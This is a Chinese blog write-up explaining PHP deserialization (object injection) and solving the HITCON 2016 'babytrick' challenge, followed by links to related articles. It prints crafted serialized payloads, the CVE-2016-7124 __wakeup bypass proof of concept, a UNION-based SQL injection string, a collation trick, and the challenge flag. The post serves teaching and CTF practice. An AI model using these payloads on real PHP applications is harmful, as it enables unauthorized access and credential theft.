php unseralize,由HITCON 2016一道web聊一聊php反序列化漏洞

最新推荐文章于 2022-04-07 22:30:55 发布
最新推荐文章于 2022-04-07 22:30:55 发布
阅读量292 收藏
点赞数
文章标签: php unseralize

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

* 本文原创作者:grt1stnull,本文属FreeBuf原创奖励计划,未经许可禁止转载

反序列化漏洞在各种语言中都较为常见,下面介绍一下php的反序列化漏洞。

1.unserialize函数

php官方文档(http://php.net/manual/en/function.unserialize.php),从中可以得到信息unserialize函数会产生一个php值,类型可能为数组、对象等等。如果被反序列化的变量为对象,在成功重构对象后php会自动调用__wakeup成员方法(如果方法存在、解构失败会返回false)同时给出了警告,不要传递给unserialize不信任的用户输入。理解序列化的字符串(unserlialize的参数):

O:3:"foo":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:5:"aaaaa";}

O:3: 参数类型为对象(object),数组(array)为a

"foo":2: 参数名为foo,有两个值

S:4:"file";s:9:"shell.php"; s:参数类型为字符串(数字为i),长度为4,值为file。长度为9的字符串shell.php

s:4:"data";s:5:"aaaaa";} 长度为4的字符串data,长度为5的字符串aaaaa

object foo,属性file:shell.php,属性data:aaaaa

2.反序列化漏洞

php反序列化漏洞又称对象注入,可能会导致远程代码执行(RCE)

个人理解漏洞为执行unserialize函数,调用某一类并执行魔术方法(magic method),之后可以执行类中函数,产生安全问题。

所以漏洞的前提:1)unserialize函数的变量可控

2)php文件中存在可利用的类,类中有魔术方法

利用场景在ctf、代码审计中常见,黑盒测试要通过检查cookie等有没有序列化的值来查看。

反序列化漏洞比如去年12月的joomla反序列化漏洞、SugarCRM v6.5.23 PHP反序列化对象注入漏洞,ctf中比如三个白帽第三期、安恒杯web3。

防御方法主要有对参数进行处理、换用更安全的函数。

推荐阅读:SugarCRM v6.5.23 PHP反序列化对象注入漏洞分析

3.反序列化练习

如下为一个php文件源码,我们定义了一个对象之后又创建了对象并输出了序列化的字符串<?php

// 某类

class User

{

// 类数据

public $age = 0;

public $name = '';

// 输出数据

public function PrintData()

{

echo 'User ' . $this->name . ' is ' . $this->age

. ' years old.
';

}

}

// 创建一个对象

$usr = new User();

// 设置数据

$usr->age = 20;

$usr->name = 'John';

// 输出数据

$usr->PrintData();

// 输出序列化之后的数据

echo serialize($usr);

?>

输出为:User John is 20 years old.

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

以下代码同上,不过并没有创建对象,而是使用unserialize函数调用了这个类。大家可以试一下。<?php

// 某类

class User

{

// Class data

public $age = 0;

public $name = '';

// Print data

public function PrintData()

{

echo 'User ' . $this->name . ' is ' . $this->age . ' years old.
';

}

}

// 重建对象

$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// 调用PrintData 输出数据

$usr->PrintData();

?>

输出为:User John is 20 years old

这个函数中的序列化字符串为'O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}',即一个user对象,属性值age为20,属性值name为john。调用user类并给属性赋了值,在有魔术方法时会自动调用。

4.writeup实战

以本次HITCON 2016的web题babytrick为例:<?php

include "config.php";

class HITCON{

private $method;

private $args;

private $conn;

public function __construct($method, $args) {

$this->method = $method;

$this->args = $args;

$this->__conn();

}

function show() {

list($username) = func_get_args();

$sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);

$obj = $this->__query($sql);

if ( $obj != false ) {

$this->__die( sprintf("%s is %s", $obj->username, $obj->role) );

} else {

$this->__die("Nobody Nobody But You!");

}

}

function login() {

global $FLAG;

list($username, $password) = func_get_args();

$username = strtolower(trim(mysql_escape_string($username)));

$password = strtolower(trim(mysql_escape_string($password)));

$sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);

if ( $username == 'orange' || stripos($sql, 'orange') != false ) {

$this->__die("Orange is so shy. He do not want to see you.");

}

$obj = $this->__query($sql);

if ( $obj != false && $obj->role == 'admin' ) {

$this->__die("Hi, Orange! Here is your flag: " . $FLAG);

} else {

$this->__die("Admin only!");

}

}

function source() {

highlight_file(__FILE__);

}

function __conn() {

global $db_host, $db_name, $db_user, $db_pass, $DEBUG;

if (!$this->conn)

$this->conn = mysql_connect($db_host, $db_user, $db_pass);

mysql_select_db($db_name, $this->conn);

if ($DEBUG) {

$sql = "CREATE TABLE IF NOT EXISTS users (

username VARCHAR(64),

password VARCHAR(64),

role VARCHAR(64)

) CHARACTER SET utf8";

$this->__query($sql, $back=false);

$sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";

$this->__query($sql, $back=false);

}

mysql_query("SET names utf8");

mysql_query("SET sql_mode = 'strict_all_tables'");

}

function __query($sql, $back=true) {

$result = @mysql_query($sql);

if ($back) {

return @mysql_fetch_object($result);

}

}

function __die($msg) {

$this->__close();

header("Content-Type: application/json");

die( json_encode( array("msg"=> $msg) ) );

}

function __close() {

mysql_close($this->conn);

}

function __destruct() {

$this->__conn();

if (in_array($this->method, array("show", "login", "source"))) {

@call_user_func_array(array($this, $this->method), $this->args);

} else {

$this->__die("What do you do?");

}

$this->__close();

}

function __wakeup() {

foreach($this->args as $k => $v) {

$this->args[$k] = strtolower(trim(mysql_escape_string($v)));

}

}

}

if(isset($_GET["data"])) {

@unserialize($_GET["data"]);

} else {

new HITCON("source", array());

}

从源码中可以看到使用了unserialize函数并且没有过滤,且定义了类。所以想到php反序列化漏洞、对象注入。

要想得到flag,需要利用反序列化执行类中函数login。首先需要用户orange密码(如果存在orange的话),于是利用类中show函数得到密码。

看show函数我们可以看出未对参数进行过滤,可以进行sql注入,构造语句为:bla’ union select password,username,password from users where username=’orange’– –

那么如何使用反序列化执行函数呢?注意到类中有魔术方法__wakeup,其中函数会对我们的输入进行过滤、转义。

如何绕过__wakeup呢?谷歌发现了CVE-2016-7124,一个月前爆出的。简单来说就是当序列化字符串中,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup的执行。参考https://bugs.php.net/bug.php?id=72663,某一种情况下,出错的对象不会被毁掉,会绕过__wakeup函数、引用其他的魔术方法。

官方exp如下:<?php

class obj implements Serializable {

var $data;

function serialize() {

return serialize($this->data);

}

function unserialize($data) {

$this->data = unserialize($data);

}

}

$inner = 'a:1:{i:0;O:9:"Exception":2:{s:7:"'."".'*'."".'file";R:4;}';

$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;R:4;}';

$data = unserialize($exploit);

echo $data[1];

?>

根据poc进行改造如下,计入了O:9:"Exception":2:{s:7:"*file";R:4;};}O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:6:"orange";i:1;s:8:"password";}s:12:"%00HITCON%00conn";O:9:"Exception":2:{s:7:"*file";R:4;};}}

这种情况下就不会执行__wakeup方法。

(同时该cve介绍了另一种情况,即成员属性数目大于实际数目时可绕过wakeup方法,把 O:6:"HITCON":3 中的3改为任意比3大数字即可,如5。另一种绕过方法为对wakeup过滤的绕过,利用了sql注入中的/**/

为什么构造的字符串为“%00HITCON%00..."呢?k14us大佬告诉我序列化时生成的序列化字符串中类名前后本来就会有0x00,url编码下为%00。可以echo(serialize($o))查看。前面举的例子之所以没用%00是因为成员属性为private。

如果在文件里直接调试就不用url编码,直接" HITCON ..."即可(%00替换为空格

加入注入语句为:O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:2:{i:0;s:83:"bla’ union select password,username,password from users where username=’orange’– –";i:1;s:6:"phddaa";}s:12:"%00HITCON%00conn";O:9:"Exception":2:{s:7:"*file";R:4;};}}

得到结果:

{"msg":"babytrick1234 is babytrick1234"}

构造好:O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:6:"orange";i:1;s:13:"babytrick1234";}s:12:"%00HITCON%00conn";O:9:"Exception":2:{s:7:"*file";R:4;};}}

这时会返回

{"msg":"Orange is so shy. He do not want to see you."}

接下来考虑如何绕过,注意到__conn方法中有 mysql_query("SET names utf8"); 观察到php的字符编码不是utf8,考虑利用字符差异绕过。目前看到的两个wp利用的字母有Ą、Ã,可实现绕过。

poc为:O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:6:"orÃnge";i:1;s:13:"babytrick1234";}s:12:"%00HITCON%00conn";O:9:"Exception":2:{s:7:"*file";R:4;};}}

得到了空白页面,注意到 s:6:"orÃnge" ,改为s:6:"orÃnge" ,构造如下:O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÃnge";i:1;s:13:"babytrick1234";}s:12:"%00HITCON%00conn";O:9:"Exception":2:{s:7:"*file";R:4;};}}

得到了结果,很开心有木有?

{"msg":"Hi, Orange! Here is your flag: hitcon{php 4nd mysq1 are s0 mag1c, isn't it?}"}

参考资料:

* 本文原创作者:grt1stnull,本文属FreeBuf原创奖励计划,未经许可禁止转载

kei酱inTOKYO
关注
map序列化和反序列化_php反序列化|无unserialize函数反序列化漏洞
weixin_39926678的博客
12-22 347
传统的php反序列化漏洞必须要两个条件:存在反序列化漏洞php对象unserialize函数漏洞可控在实际的php程序中,反序列化链(pop链),如thinkphp、Laravel的反序列化链的漏洞偶尔会爆出来但是这样写代码的还是很少的。$data = unserialize($_POST['a']);但是phar文件的出现,给php反序列化漏洞带来了新的攻击面,可以做的无unseri...
HITCON 2016——PHP反序列化漏洞
qq_41560595的博客
09-18 418
PHP反序列化漏洞典型例题
php unseralize,libs/Swoole/Protocol/RPCServer.php · swoole/framework - Gitee.com
weixin_33263633的博客
03-20 105
namespace Swoole\Protocol;use Swoole;/*** RPC服务器* @package Swoole\Network* @method beforeRequest* @method afterRequest*/class RPCServer extends Base implements Swoole\IFace\Protocol{/*** 版本号*/const VE...
反序列化(Unserialize)漏洞详解
qq_49422880的博客
09-28 1万+
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
php unseralize,幾個 PHP 的"魔術常量","魔術方法"
weixin_34395361的博客
03-20 94
最近兩天后端工作比較輕松,空余時間復習復習PHP手冊,就復習下魔術方法跟魔術變量__FLINE__: 文件中當前的行數;__FILE__: 文件的完整路徑和文件名.如果用在被包含文件中,則返回被包含的文件名.自PHP4.0.2起,__FILE__總是包含一個絕對路徑,(如果是符號連接,則是解析后的絕對路徑),而在此之前的版本又是會包含一個相對路徑;__DIR__: 文件所在的目錄.如果用在...
PHP面向对象之对象串行化和反串行化
yiqitony的专栏
04-07 721
对象也是一种在内存中存储的数据类型,t
反序列化漏洞汇总
hackzkaq的博客
12-08 5206
一.反序列化的基本内容 类对象方法 类(Class): 用来描述具有相同的属性和方法的对象的集合。 它定义了该集合中每个对象所共有的属性和方法。对象是类的实例。 对象:通过类定义的数据结构实例。对象包括两个数据成员(类变量和实例变量)和方法。 对象:某一个具体的事物、实体或事例 类是类型,比如人类,犬类; 对象是某种类的一个实例(实际的例子),比如身为人类的你就是一个对象,你家养的狗就属于犬类的一个对象,或者说一个实例; 你可能经常会听到“实例化对象”,这句话的意思就是创建对象,此处的实例名词作动词用,作名
ctf之php序列化,CTF——Web——PHP序列化和反序列化
weixin_35126200的博客
04-01 992
PHP 序列化和反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
houseoforange_hitcon_2016
fayinq的博客
04-07 292
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1611
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
php serialize()和unserialize()的一个坑
木子空间
09-17 7654
有个业务需求
PHPunset()用法详解
码出幸福人生
09-10 3万+
unset() 销毁指定的变量。注意在 PHP 3 中,unset() 将返回 TRUE(实际上是整型值 1),而在 PHP 4 中,unset() 不再是一个真正的函数:它现在是一个语句。这样就没有了返回值,试图获取 unset() 的返回值将导致解析错误。 例子 1. unset() 示例 // 销毁单个变量 unset ($foo); //
php unset()详解
热门推荐
贝伦酱
12-11 5万+
unset这个函数经常会被用到,用于销毁指定的变量,但它有自己的行为模式,如果不仔细的话可能会被中文解释给迷惑: 先来看看官方文档的说法: unset  —— unset a given variable
php中serialize()与unserialize()函数使用方法
BoGo专栏.PHP
02-07 3503
php中serialize()与unserialize()函数使用方法 在php中serialize()与unserialize()函数是一对函数,下面本文章就来为各位同学介绍serialize()与unserialize()函数的使用例子,希望能帮助到各位。 php函数serialize(): 这个函数作用就是序列化数据,返回一个可存储的字符串,该函数有利于存储或传递PHP的值,同
php销毁变量,PHP unsert() 销毁变量
weixin_32494473的博客
03-10 539
unset() 用于销毁一个或多个变量。unset()PHP unset() 用于销毁一个或多个变量,没有返回值。语法:void unset( mixed var [, mixed var [, ...]] )例子:// 销毁单个变量unset ($var);// 销毁单个数组元素unset ($arr['a']);// 销毁多个变量unset ($var1, $var2, $var3);?&gt...
php函数serialize()与unserialize()
larance的挨踢生活
08-31 868
本文转自:http://zxianf.blog.163.com/blog/static/30120701201072443623381/ php函数serialize()与unserialize()说明及案例。想要将已序列化的字符串变回 PHP 的值,可使用unserial
php unserialize()
weixin_30432179的博客
07-02 382
unserialize—从已存储的表示中创建 PHP 的值 mixed unserialize(string$str) unserialize()对单一的已序列化的变量进行操作,将其转换回 PHP 的值。 参数str : 序列化后的字符串。 若被解序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用__wakeup()成员函数(如果存在的话)。 ...
BUUCTF web writeup
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
[hitcon 2017]ssrfme 1
最新发布
04-11
SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值